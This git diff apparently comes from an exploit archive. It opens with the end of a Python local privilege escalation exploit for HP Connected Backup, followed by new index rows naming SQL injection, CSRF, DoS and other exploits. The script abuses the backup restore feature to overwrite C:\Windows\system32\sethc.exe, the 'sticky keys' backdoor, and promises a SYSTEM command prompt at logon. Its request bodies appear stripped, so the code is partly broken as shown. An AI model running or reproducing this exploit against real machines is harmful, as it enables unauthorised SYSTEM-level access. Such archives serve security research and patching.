"Adding Restore file" + +send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""") + + +print "Setting alternate restore path to C:\\Windows\\system32\\" + +send_request("""C:\Windows\system32false""") + + +#Set restore to replace existing file +send_request("""true""") + +print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe" +send_request("""""") + +print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fff8607c5..d1e0cdb28 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5258,6 +5258,8 @@ id,file,description,date,author,type,platform,port 43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware, 43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos, 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows, +43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows, +43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware, 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx, 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows, 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows, @@ -9169,6 +9171,7 @@ id,file,description,date,author,type,platform,port 43799,exploits/windows/local/43799.txt,"Trillian Pro < 2.01 - Design Error",2004-03-01,"GulfTech Security",local,windows, 43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows, 43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows, +43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows, 40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows, 40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, 40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, @@ -37245,6 +37248,18 @@ id,file,description,date,author,type,platform,port 43850,exploits/php/webapps/43850.txt,"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities",2018-01-21,Vulnerability-Lab,webapps,php, 43852,exploits/php/webapps/43852.php,"PHPFreeChat 1.7 - Denial of Service",2018-01-21,"A. Pakbaz",webapps,php, 43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution",2018-01-21,Bæln0rn,webapps,perl, +43855,exploits/php/webapps/43855.txt,"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection",2018-01-23,Vulnerability-Lab,webapps,php, +43858,exploits/multiple/webapps/43858.txt,"NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download",2018-01-23,LiquidWorm,webapps,multiple, +43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43861,exploits/php/webapps/43861.txt,"Affiligator 2.1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43862,exploits/php/webapps/43862.html,"RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)",2018-01-23,"Ihsan Sencan",webapps,php, +43863,exploits/php/webapps/43863.txt,"Easy Car Script 2014 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43865,exploits/php/webapps/43865.txt,"Zechat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43866,exploits/php/webapps/43866.txt,"Tumder 2.1 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43867,exploits/php/webapps/43867.html,"Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2018-01-23,"Ihsan Sencan",webapps,php, +43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php, 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,